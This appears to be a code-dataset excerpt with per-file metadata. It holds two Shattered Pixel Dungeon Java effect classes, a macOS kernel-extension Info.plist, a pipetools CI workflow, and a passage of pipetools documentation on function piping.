"qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/Swap.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.Actor;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.shatteredpixel.shatteredpixeldungeon.sprites.CharSprite;
import com.watabou.noosa.Game;
import com.watabou.noosa.Visual;
import com.watabou.noosa.audio.Sample;
import com.watabou.utils.PointF;
public class Swap extends Actor {
private Char ch1;
private Char ch2;
private Effect eff1;
private Effect eff2;
private float delay;
public Swap( Char ch1, Char ch2 ) {
this.ch1 = ch1;
this.ch2 = ch2;
delay = Dungeon.level.distance( ch1.pos, ch2.pos ) * 0.1f;
eff1 = new Effect( ch1.sprite, ch1.pos, ch2.pos );
eff2 = new Effect( ch2.sprite, ch2.pos, ch1.pos );
Sample.INSTANCE.play( Assets.SND_TELEPORT );
}
@Override
protected boolean act() {
return false;
}
private void finish( Effect eff ) {
if (eff == eff1) {
eff1 = null;
}
if (eff == eff2) {
eff2 = null;
}
if (eff1 == null && eff2 == null) {
Actor.remove( this );
next();
int pos = ch1.pos;
ch1.pos = ch2.pos;
ch2.pos = pos;
Dungeon.level.occupyCell(ch1 );
Dungeon.level.occupyCell(ch2 );
if (ch1 == Dungeon.hero || ch2 == Dungeon.hero) {
Dungeon.observe();
GameScene.updateFog();
}
}
}
private class Effect extends Visual {
private CharSprite sprite;
private PointF end;
private float passed;
public Effect( CharSprite sprite, int from, int to ) {
super( 0, 0, 0, 0 );
this.sprite = sprite;
point( sprite.worldToCamera( from ) );
end = sprite.worldToCamera( to );
speed.set( 2 * (end.x - x) / delay, 2 * (end.y - y) / delay );
acc.set( -speed.x / delay, -speed.y / delay );
passed = 0;
sprite.parent.add( this );
}
@Override
public void update() {
super.update();
if ((passed += Game.elapsed) < delay) {
sprite.x = x;
sprite.y = y;
} else {
sprite.point( end );
killAndErase();
finish( this );
}
}
}
} | 2,991 | Swap | java | en | java | code | {"qsc_code_num_words": 395, "qsc_code_num_chars": 2991.0, "qsc_code_mean_word_length": 5.17974684, "qsc_code_frac_words_unique": 0.4, "qsc_code_frac_chars_top_2grams": 0.04398827, "qsc_code_frac_chars_top_3grams": 0.13000978, "qsc_code_frac_chars_top_4grams": 0.12903226, "qsc_code_frac_chars_dupe_5grams": 0.08895406, "qsc_code_frac_chars_dupe_6grams": 0.02737048, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02515723, "qsc_code_frac_chars_whitespace": 0.20260782, "qsc_code_size_file_byte": 2991.0, "qsc_code_num_lines": 128.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 23.3671875, "qsc_code_frac_chars_alphabet": 0.8327044, "qsc_code_frac_chars_comments": 0.26111668, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.02564103, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.03846154, "qsc_codejava_score_lines_no_logic": 0.30769231, "qsc_codejava_frac_words_no_modifier": 0.6, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/IceBlock.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.sprites.CharSprite;
import com.watabou.noosa.Game;
import com.watabou.noosa.Gizmo;
import com.watabou.noosa.audio.Sample;
public class IceBlock extends Gizmo {
private float phase;
private CharSprite target;
public IceBlock( CharSprite target ) {
super();
this.target = target;
phase = 0;
}
@Override
public void update() {
super.update();
if ((phase += Game.elapsed * 2) < 1) {
target.tint( 0.83f, 1.17f, 1.33f, phase * 0.6f );
} else {
target.tint( 0.83f, 1.17f, 1.33f, 0.6f );
}
}
public void melt() {
target.resetColor();
killAndErase();
if (visible) {
Splash.at( target.center(), 0xFFB2D6FF, 5 );
Sample.INSTANCE.play( Assets.SND_SHATTER );
}
}
public static IceBlock freeze( CharSprite sprite ) {
IceBlock iceBlock = new IceBlock( sprite );
if (sprite.parent != null)
sprite.parent.add( iceBlock );
return iceBlock;
}
}
| 1,848 | IceBlock | java | en | java | code | {"qsc_code_num_words": 249, "qsc_code_num_chars": 1848.0, "qsc_code_mean_word_length": 5.26104418, "qsc_code_frac_words_unique": 0.53815261, "qsc_code_frac_chars_top_2grams": 0.03435115, "qsc_code_frac_chars_top_3grams": 0.02977099, "qsc_code_frac_chars_top_4grams": 0.04351145, "qsc_code_frac_chars_dupe_5grams": 0.09618321, "qsc_code_frac_chars_dupe_6grams": 0.07633588, "qsc_code_frac_chars_dupe_7grams": 0.03358779, "qsc_code_frac_chars_dupe_8grams": 0.03358779, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.03072812, "qsc_code_frac_chars_whitespace": 0.18993506, "qsc_code_size_file_byte": 1848.0, "qsc_code_num_lines": 72.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 25.66666667, "qsc_code_frac_chars_alphabet": 0.84435538, "qsc_code_frac_chars_comments": 0.42261905, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00937207, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.07894737, "qsc_codejava_score_lines_no_logic": 0.31578947, "qsc_codejava_frac_words_no_modifier": 0.75, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00xglitch/Bella | Payloads/Insomnia.kext/Contents/Info.plist | <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>BuildMachineOSBuild</key>
<string>14A388a</string>
<key>CFBundleDevelopmentRegion</key>
<string>English</string>
<key>CFBundleExecutable</key>
<string>Insomnia_r11</string>
<key>CFBundleIdentifier</key>
<string>net.semaja2.kext.insomnia</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>KEXT</string>
<key>CFBundleSignature</key>
<string>????</string>
<key>CFBundleVersion</key>
<string>2.1.7</string>
<key>DTCompiler</key>
<string>com.apple.compilers.llvm.clang.1_0</string>
<key>DTPlatformBuild</key>
<string>6A280e</string>
<key>DTPlatformVersion</key>
<string>GM</string>
<key>DTSDKBuild</key>
<string>13E28</string>
<key>DTSDKName</key>
<string>macosx10.9</string>
<key>DTXcode</key>
<string>0600</string>
<key>DTXcodeBuild</key>
<string>6A280e</string>
<key>IOKitPersonalities</key>
<dict>
<key>Insomnia</key>
<dict>
<key>CFBundleIdentifier</key>
<string>net.semaja2.kext.insomnia</string>
<key>IOClass</key>
<string>InsomniaK</string>
<key>IOMatchCategory</key>
<string>IODefaultMatchCategory</string>
<key>IONameMatch</key>
<string>IOPMrootDomain</string>
<key>IOProviderClass</key>
<string>IOService</string>
</dict>
</dict>
<key>OSBundleLibraries</key>
<dict>
<key>com.apple.kpi.bsd</key>
<string>10.0</string>
<key>com.apple.kpi.iokit</key>
<string>10.0</string>
<key>com.apple.kpi.libkern</key>
<string>10.0</string>
</dict>
</dict>
</plist>
| 1,674 | Info | plist | en | openstep property list | data | {"qsc_code_num_words": 213, "qsc_code_num_chars": 1674.0, "qsc_code_mean_word_length": 5.52112676, "qsc_code_frac_words_unique": 0.3286385, "qsc_code_frac_chars_top_2grams": 0.17602041, "qsc_code_frac_chars_top_3grams": 0.03401361, "qsc_code_frac_chars_top_4grams": 0.03571429, "qsc_code_frac_chars_dupe_5grams": 0.21428571, "qsc_code_frac_chars_dupe_6grams": 0.15816327, "qsc_code_frac_chars_dupe_7grams": 0.15816327, "qsc_code_frac_chars_dupe_8grams": 0.15816327, "qsc_code_frac_chars_dupe_9grams": 0.15816327, "qsc_code_frac_chars_dupe_10grams": 0.1037415, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.03486842, "qsc_code_frac_chars_whitespace": 0.09199522, "qsc_code_size_file_byte": 1674.0, "qsc_code_num_lines": 61.0, "qsc_code_num_chars_line_max": 103.0, "qsc_code_num_chars_line_mean": 27.44262295, "qsc_code_frac_chars_alphabet": 0.73881579, "qsc_code_frac_chars_comments": 0.0, "qsc_code_cate_xml_start": 1.0, "qsc_code_frac_lines_dupe_lines": 0.27868852, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.05017921, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_words_unique": 1, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 1, "qsc_code_cate_autogen": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0} |
0101/pipetools | .github/workflows/tests.yml | name: Tests
on:
push:
branches: [ master ]
pull_request:
branches: [ master ]
jobs:
run-tests:
runs-on: ubuntu-latest
strategy:
fail-fast: false
matrix:
python-version: [3.7, 3.8, '3.x']
steps:
- uses: actions/checkout@v2
- name: Set up Python ${{ matrix.python-version }}
uses: actions/setup-python@v2
with:
python-version: ${{ matrix.python-version }}
- name: Install dependencies
run: |
python -m pip install --upgrade pip
python -m pip install flake8 pytest pytest-cov
if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
- name: Lint with flake8
run: |
# stop the build if there are Python syntax errors or undefined names
flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics
# exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide
flake8 . --count --exit-zero --max-complexity=6 --max-line-length=127 --statistics
- name: Test with pytest
run: |
pytest --cov=pipetools
build-docs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: '3.x'
- name: Install dependencies
run: |
python -m pip install --upgrade pip
pip install -r docs/requirements.txt
python setup.py develop
- name: Test with pytest
run: |
pytest --cov=pipetools
- name: Create coverage badge
run: |
coverage-badge -f -o coverage.svg
- name: Update README
run: |
python build_scripts/generate_readme.py
- name: Commit badge and README
uses: EndBug/add-and-commit@v7
with:
default_author: github_actions
message: '(README update)'
add: '["coverage.svg", "README.rst"]'
- name: Build Sphinx documentation
run: |
sphinx-build -b html docs/source/ doc
| 2,020 | tests | yml | en | yaml | data | {"qsc_code_num_words": 253, "qsc_code_num_chars": 2020.0, "qsc_code_mean_word_length": 4.7944664, "qsc_code_frac_words_unique": 0.44664032, "qsc_code_frac_chars_top_2grams": 0.05358615, "qsc_code_frac_chars_top_3grams": 0.04699093, "qsc_code_frac_chars_top_4grams": 0.04204452, "qsc_code_frac_chars_dupe_5grams": 0.286892, "qsc_code_frac_chars_dupe_6grams": 0.286892, "qsc_code_frac_chars_dupe_7grams": 0.286892, "qsc_code_frac_chars_dupe_8grams": 0.286892, "qsc_code_frac_chars_dupe_9grams": 0.15498763, "qsc_code_frac_chars_dupe_10grams": 0.08738664, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01960784, "qsc_code_frac_chars_whitespace": 0.29306931, "qsc_code_size_file_byte": 2020.0, "qsc_code_num_lines": 81.0, "qsc_code_num_chars_line_max": 91.0, "qsc_code_num_chars_line_mean": 24.9382716, "qsc_code_frac_chars_alphabet": 0.82983193, "qsc_code_frac_chars_comments": 0.0, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.453125, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.02524752, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_words_unique": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0} |
0101/pipetools | docs/source/overview.rst | ``pipetools`` enables function composition similar to using Unix pipes.
It allows forward-composition and piping of arbitrary functions - no need to decorate them or do anything extra.
It also packs a bunch of utils that make common operations more convenient and readable.
Source is on github_.
.. _github: https://github.com/0101/pipetools
Why?
----
Piping and function composition are some of the most natural operations there are for
plenty of programming tasks. Yet Python doesn't have a built-in way of performing them.
That forces you to either deep nesting of function calls or adding extra **glue code**.
Example
-------
Say you want to create a list of python files in a given directory, ordered by
filename length, as a string, each file on one line and also with line numbers:
.. code-block:: pycon
>>> print(pyfiles_by_length('../pipetools'))
1. ds_builder.py
2. __init__.py
3. compat.py
4. utils.py
5. main.py
All the ingredients are already there, you just have to glue them together. You might write it like this:
.. code-block:: python
def pyfiles_by_length(directory):
all_files = os.listdir(directory)
py_files = [f for f in all_files if f.endswith('.py')]
sorted_files = sorted(py_files, key=len, reverse=True)
numbered = enumerate(py_files, 1)
rows = ("{0}. {1}".format(i, f) for i, f in numbered)
return '\n'.join(rows)
Or perhaps like this:
.. code-block:: python
def pyfiles_by_length(directory):
return '\n'.join('{0}. {1}'.format(*x) for x in enumerate(reversed(sorted(
[f for f in os.listdir(directory) if f.endswith('.py')], key=len)), 1))
Or, if you're a mad scientist, you would probably do it like this:
.. code-block:: python
pyfiles_by_length = lambda d: (reduce('{0}\n{1}'.format,
map(lambda x: '%d. %s' % x, enumerate(reversed(sorted(
filter(lambda f: f.endswith('.py'), os.listdir(d)), key=len))))))
But *there should be one -- and preferably only one -- obvious way to do it*.
So which one is it? Well, to redeem the situation, ``pipetools`` give you yet
another possibility!
.. code-block:: python
pyfiles_by_length = (pipe
| os.listdir
| where(X.endswith('.py'))
| sort_by(len).descending
| (enumerate, X, 1)
| foreach("{0}. {1}")
| '\n'.join)
*Why would I do that*, you ask? Comparing to the *native* Python code, it's
- **Easier to read** -- minimal extra clutter
- **Easier to understand** -- one-way data flow from one step to the next, nothing else to keep track of
- **Easier to change** -- want more processing? just add a step to the pipeline
- **Removes some bug opportunities** -- did you spot the bug in the first example?
Of course it won't solve all your problems, but a great deal of code *can*
be expressed as a pipeline, giving you the above benefits. Read on to see how it works!
Installation
------------
.. code-block:: console
$ pip install pipetools
`Uh, what's that? <https://pip.pypa.io>`_
Usage
-----
.. _the-pipe:
The pipe
""""""""
The ``pipe`` object can be used to pipe functions together to
form new functions, and it works like this:
.. code-block:: python
from pipetools import pipe
f = pipe | a | b | c
# is the same as:
def f(x):
return c(b(a(x)))
A real example, sum of odd numbers from 0 to *x*:
.. code-block:: python
from functools import partial
from pipetools import pipe
odd_sum = pipe | range | partial(filter, lambda x: x % 2) | sum
odd_sum(10) # -> 25
Note that the chain up to the `sum` is lazy.
Automatic partial application in the pipe
"""""""""""""""""""""""""""""""""""""""""
As partial application is often useful when piping things together, it is done
automatically when the *pipe* encounters a tuple, so this produces the same
result as the previous example:
.. code-block:: python
odd_sum = pipe | range | (filter, lambda x: x % 2) | sum
As of ``0.1.9``, this is even more powerful, see :doc:`X-partial <xpartial>`.
Built-in tools
""""""""""""""
Pipetools contain a set of *pipe-utils* that solve some common tasks. For
example there is a shortcut for the filter class from our example, called
:func:`~pipetools.utils.where`:
.. code-block:: python
from pipetools import pipe, where
odd_sum = pipe | range | where(lambda x: x % 2) | sum
Well that might be a bit more readable, but not really a huge improvement, but
wait!
If a *pipe-util* is used as first or second item in the pipe (which happens
quite often) the ``pipe`` at the beginning can be omitted:
.. code-block:: python
odd_sum = range | where(lambda x: x % 2) | sum
See :doc:`pipe-utils' documentation<pipeutils>`.
OK, but what about the ugly lambda?
"""""""""""""""""""""""""""""""""""
:func:`~pipetools.utils.where`, but also :func:`~pipetools.utils.foreach`,
:func:`~pipetools.utils.sort_by` and other :doc:`pipe-utils<pipeutils>` can be
quite useful, but require a function as an argument, which can either be a named
function -- which is OK if it does something complicated -- but often it's
something simple, so it's appropriate to use a ``lambda``. Except Python's
lambdas are quite verbose for simple tasks and the code gets cluttered...
**X object** to the rescue!
.. code-block:: python
from pipetools import where, X
odd_sum = range | where(X % 2) | sum
How 'bout that.
:doc:`Read more about the X object and it's limitations.<xobject>`
.. _auto-string-formatting:
Automatic string formatting
"""""""""""""""""""""""""""
Since it doesn't make sense to compose functions with strings, when a pipe (or a
:doc:`pipe-util<pipeutils>`) encounters a string, it attempts to use it for
`(advanced) formatting`_:
.. code-block:: pycon
>>> countdown = pipe | (range, 1) | reversed | foreach('{}...') | ' '.join | '{} boom'
>>> countdown(5)
'4... 3... 2... 1... boom'
.. _(advanced) formatting: http://docs.python.org/library/string.html#formatstrings
Feeding the pipe
""""""""""""""""
Sometimes it's useful to create a one-off pipe and immediately run some input
through it. And since this is somewhat awkward (and not very readable,
especially when the pipe spans multiple lines):
.. code-block:: python
result = (pipe | foo | bar | boo)(some_input)
It can also be done using the ``>`` operator:
.. code-block:: python
result = some_input > pipe | foo | bar | boo
.. note::
Note that the above method of input won't work if the input object
defines `__gt__ <https://docs.python.org/3/reference/datamodel.html#object.__gt__>`_
for *any* object - including the pipe. This can be the case for example with
some objects from math libraries such as NumPy. If you experience strange
results try falling back to the standard way of passing input into a pipe.
| 6,884 | overview | rst | en | restructuredtext | text | {"qsc_doc_frac_chars_curly_bracket": 0.00290529, "qsc_doc_frac_words_redpajama_stop": 0.29046705, "qsc_doc_num_sentences": 109.0, "qsc_doc_num_words": 1067, "qsc_doc_num_chars": 6884.0, "qsc_doc_num_lines": 240.0, "qsc_doc_mean_word_length": 4.28397376, "qsc_doc_frac_words_full_bracket": 0.0, "qsc_doc_frac_lines_end_with_readmore": 0.00416667, "qsc_doc_frac_lines_start_with_bullet": 0.0, "qsc_doc_frac_words_unique": 0.34020619, "qsc_doc_entropy_unigram": 5.33475634, "qsc_doc_frac_words_all_caps": 0.00703775, "qsc_doc_frac_lines_dupe_lines": 0.12244898, "qsc_doc_frac_chars_dupe_lines": 0.06666667, "qsc_doc_frac_chars_top_2grams": 0.02953402, "qsc_doc_frac_chars_top_3grams": 0.03937869, "qsc_doc_frac_chars_top_4grams": 0.01487639, "qsc_doc_frac_chars_dupe_5grams": 0.09013345, "qsc_doc_frac_chars_dupe_6grams": 0.07919492, "qsc_doc_frac_chars_dupe_7grams": 0.04812951, "qsc_doc_frac_chars_dupe_8grams": 0.02187705, "qsc_doc_frac_chars_dupe_9grams": 0.02187705, "qsc_doc_frac_chars_dupe_10grams": 0.02187705, "qsc_doc_frac_chars_replacement_symbols": 0.0, "qsc_doc_cate_code_related_file_name": 0.0, "qsc_doc_num_chars_sentence_length_mean": 16.79069767, "qsc_doc_frac_chars_hyperlink_html_tag": 0.02019175, "qsc_doc_frac_chars_alphabet": 0.82277102, "qsc_doc_frac_chars_digital": 0.00726348, "qsc_doc_frac_chars_whitespace": 0.20002905, "qsc_doc_frac_chars_hex_words": 0.0} | 1 | {"qsc_doc_frac_chars_replacement_symbols": 0, "qsc_doc_entropy_unigram": 0, "qsc_doc_frac_chars_top_2grams": 0, "qsc_doc_frac_chars_top_3grams": 0, "qsc_doc_frac_chars_top_4grams": 0, "qsc_doc_frac_chars_dupe_5grams": 0, "qsc_doc_frac_chars_dupe_6grams": 0, "qsc_doc_frac_chars_dupe_7grams": 0, "qsc_doc_frac_chars_dupe_8grams": 0, "qsc_doc_frac_chars_dupe_9grams": 0, "qsc_doc_frac_chars_dupe_10grams": 0, "qsc_doc_frac_chars_dupe_lines": 0, "qsc_doc_frac_lines_dupe_lines": 0, "qsc_doc_frac_lines_end_with_readmore": 0, "qsc_doc_frac_lines_start_with_bullet": 0, "qsc_doc_frac_words_all_caps": 0, "qsc_doc_mean_word_length": 0, "qsc_doc_num_chars": 0, "qsc_doc_num_lines": 0, "qsc_doc_num_sentences": 0, "qsc_doc_num_words": 0, "qsc_doc_frac_chars_hex_words": 0, "qsc_doc_frac_chars_hyperlink_html_tag": 0, "qsc_doc_frac_chars_alphabet": 0, "qsc_doc_frac_chars_digital": 0, "qsc_doc_frac_chars_whitespace": 0} |
0101/pipetools | docs/source/pipeutils.rst | pipe-utils
==========
Generic piping utilities.
Other functions can be piped to them, from both sides, without having to use the
``pipe`` object. The resulting function then also inherits this functionality.
Built-in
--------
Even though these are defined in the ``pipetools.utils`` module, they're
importable directly from ``pipetools`` for convenience.
All of these that take a function as an argument can automatically partially
apply the given function with positional and/or keyword arguments, for example::
foreach(some_func, foo, bar=None)
Is the same as::
foreach(partial(some_func, foo, bar=None))
(As of ``0.1.9`` this uses :doc:`xpartial`)
They also automatically convert the :doc:`X object<xobject>` to an actual
function.
List of built-in utils
----------------------
.. automodule:: pipetools.utils
:members:
Make your own
-------------
You can make your own, but you generally shouldn't need to, since you can pipe
any functions you like.
But if you feel like there's a generally reusable *pipe-util* missing, feel
free to add it via a pull request on github_.
.. _github: https://github.com/0101/pipetools
How to do it? Just write the function and stick the
